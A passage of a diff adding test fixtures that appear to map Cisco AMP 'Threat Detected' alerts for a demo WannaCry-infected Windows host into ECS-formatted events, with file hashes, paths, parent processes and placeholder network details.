+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303565650559000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303565650558984",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:09.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843648712Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303565650559000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303565650558983",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "mssecsvc.exe",
+                "pid": 7144,
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:09.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\Windows\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843650655Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303565650559000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303565650558982",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "mssecsvc.exe",
+                "pid": 7144,
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:09.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843652586Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303565650559000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303565650558981",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:09.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843654448Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303565650559000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303565650558980",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:09.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843656334Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303565650559000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303565650558979",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 768,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:09.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843658227Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303565650559000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.24D004A104-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303565650558978",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 768,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:09.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843660456Z",
